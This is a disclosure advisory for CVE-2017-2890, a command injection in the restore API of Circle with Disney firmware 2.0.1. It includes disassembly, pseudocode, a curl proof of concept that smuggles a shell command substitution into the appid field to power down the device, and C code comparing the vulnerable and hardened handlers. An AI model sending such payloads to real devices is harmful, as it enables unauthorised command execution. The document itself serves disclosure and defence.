CVE-2017-2890
An exploitable vulnerability exists in the /api/CONFIG/restore functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause an OS command injection. An attacker can send an HTTP request to trigger this vulnerability.
Circle with Disney 2.0.1
9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-77: Improper Neutralization of Special Elements used in a Command (‘Command Injection’)
The vulnerable code exists in the restore API handler of the "apid" daemon ("/api/CONFIG/restore"), function sub_417528:
.text:004176A4 loc_4176A4:
.text:004176A4 lw $v0, (dword_44CB3C - 0x450000)($v0)
.text:004176A8 nop
.text:004176AC beqz $v0, loc_4177A8
.text:004176B0 li $v0, 1
.text:004176B4 beq $s4, $v0, loc_417860
.text:004176B8 lui $a0, 0x43
.text:004176BC jal strlen
.text:004176C0 addiu $a0, $s6, (byte_44CC40 - 0x450000)
.text:004176C4 sltiu $v0, 0x14
.text:004176C8 bnez $v0, loc_4177A8
.text:004176CC lui $v0, 0x45
.text:004176D0 la $v0, byte_44CC40 # appid
.text:004176D4 sw $v0, 0x200+var_1F0($sp)
.text:004176D8 lui $a2, 0x43
.text:004176DC li $v0, 0x42
.text:004176E0 lui $a3, 0x43
.text:004176E4 addiu $a0, $sp, 0x200+var_148
.text:004176E8 li $a1, 0x80
.text:004176EC la $a2, aSrestore_backu # "%srestore_backup.sh /tmp/postfile.bin %s %d"
.text:004176F0 la $a3, aMntSharesUs_19 # "/mnt/shares/usr/bin/scripts/"
.text:004176F4 jal snprintf
.text:004176F8 sw $v0, 0x200+var_1EC($sp)
.text:004176FC jal system
.text:00417700 addiu $a0, $sp, 0x200+var_148
Looking at the pseudocode of the whole function, we see the following (note that the `sltiu $v0, 0x14` / `bnez` pair in the disassembly bails out when strlen(appid) is less than 20, so the handler proceeds only for appids of 20 or more characters):
if (memcmp(request_url, "/api/CONFIG/restore", 18) == 0) {
    if (stat("/mnt/shares/usr/bin/app_list") == 0) {
        if (auth_token[0] != 0 && check_token(auth_token)) {
            if (strlen(appid) >= 20) {
                snprintf(cmd, 128, "%srestore_backup.sh /tmp/postfile.bin %s %d", "/mnt/shares/usr/bin/scripts/", appid, 66);
                system(cmd);
            }
        }
    }
}
As we can see, the appid parameter, which comes from the user as a multipart form parameter, is formatted into a command line and passed directly to system() without any sanitization. Any shell metacharacters in appid (command substitution, ";", "|", "&" and so on) are therefore interpreted by /bin/sh, leading to command injection. The only constraints on the payload are the 20-character minimum length and the 128-byte command buffer, which truncates anything longer. This API is accessible only to authenticated users, which is reflected in the PR:L component of the CVSS vector.
The following proof of concept shows how to execute the "power_down.sh" script on the device. An attacker needs to use a valid token in order to trigger the vulnerability; sIP and sToken below are the device address and a valid session token respectively.
$ sAppid=$(python -c 'print "$(/etc/circle/power_down.sh)".ljust(20, "x")');
$ touch empty
$ curl -k "https://${sIP}:4567/api/CONFIG/restore" -F "token=${sToken}" -F "appid=${sAppid}" -F "upload=@empty"
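The following C program is an added example, not code from the advisory or from the Circle firmware. It reproduces the vulnerable string-building step shown in the disassembly (so the effect of the 20-character gate and the 128-byte buffer on the PoC payload can be seen), and puts a hardened version beside it: an allowlist check on appid followed by fork()/execv() with a fixed argv, so no shell ever parses the user-controlled value. The allowed appid character set (letters, digits, '.', '_', '-') and the 64-character upper bound are assumptions for illustration; the advisory does not define the appid format.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define CMD_LEN     128
#define SCRIPTS_DIR "/mnt/shares/usr/bin/scripts/"
#define POSTFILE    "/tmp/postfile.bin"

/* Mirror of the vulnerable handler: appid is formatted straight into a
 * shell command line, exactly as the disassembly shows.  Returns -1 when
 * the length gate (strlen(appid) < 20 -> bail out) rejects the appid,
 * otherwise the length snprintf wanted to write, so a caller can detect
 * truncation at CMD_LEN (return value >= cmd_len). */
int build_restore_cmd_vulnerable(const char *appid, char *cmd, size_t cmd_len)
{
    if (strlen(appid) < 20)
        return -1;                 /* sltiu $v0, 0x14 / bnez in the listing */
    return snprintf(cmd, cmd_len, "%srestore_backup.sh " POSTFILE " %s %d",
                    SCRIPTS_DIR, appid, 66);
}

/* Allowlist check (assumed appid format, not taken from the advisory):
 * ASCII letters, digits, '.', '_' and '-' only, 20..64 characters.
 * Every shell metacharacter an injection relies on ($ ( ) ` ; | & space
 * newline) is rejected. */
int appid_is_safe(const char *appid)
{
    size_t n = strlen(appid);
    if (n < 20 || n > 64)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)appid[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

/* Hardened restore: validate appid, then run the script via fork/execv
 * with a fixed argv.  Because /bin/sh is never involved, even a
 * metacharacter that slipped past the allowlist would reach the script as
 * a literal argument.  Returns the script's exit status, or -1 if appid is
 * rejected or the child could not be started/waited for. */
int restore_safe(const char *appid)
{
    if (!appid_is_safe(appid))
        return -1;
    char *argv[] = { SCRIPTS_DIR "restore_backup.sh", POSTFILE,
                     (char *)appid, "66", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);                /* exec failed, e.g. script not present */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed payload matching the advisory's PoC: a command
     * substitution; it is already 28 characters, so it passes the gate. */
    const char *payload = "$(/etc/circle/power_down.sh)";
    char cmd[CMD_LEN];
    int n = build_restore_cmd_vulnerable(payload, cmd, sizeof cmd);
    printf("vulnerable path would run: system(\"%s\")%s\n", cmd,
           n >= CMD_LEN ? "  [truncated]" : "");
    printf("appid_is_safe(payload)                   = %d\n", appid_is_safe(payload));
    printf("appid_is_safe(\"com.example.legit_app_01\") = %d\n",
           appid_is_safe("com.example.legit_app_01"));
    printf("restore_safe(payload)                    = %d\n", restore_safe(payload));
    return 0;
}
```

The fixed prefix of the command ("/mnt/shares/usr/bin/scripts/restore_backup.sh /tmp/postfile.bin ") is 64 bytes and the suffix " 66" is 3 more, so build_restore_cmd_vulnerable reports truncation once appid exceeds 60 characters; an injected payload has to complete its command substitution within that budget, which is why the PoC keeps it short.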
2017-08-29 - Vendor Disclosure
2017-10-31 - Public Release
Discovered by Claudio Bozzato and Lilith Wyatt <(^_^)> of Cisco Talos.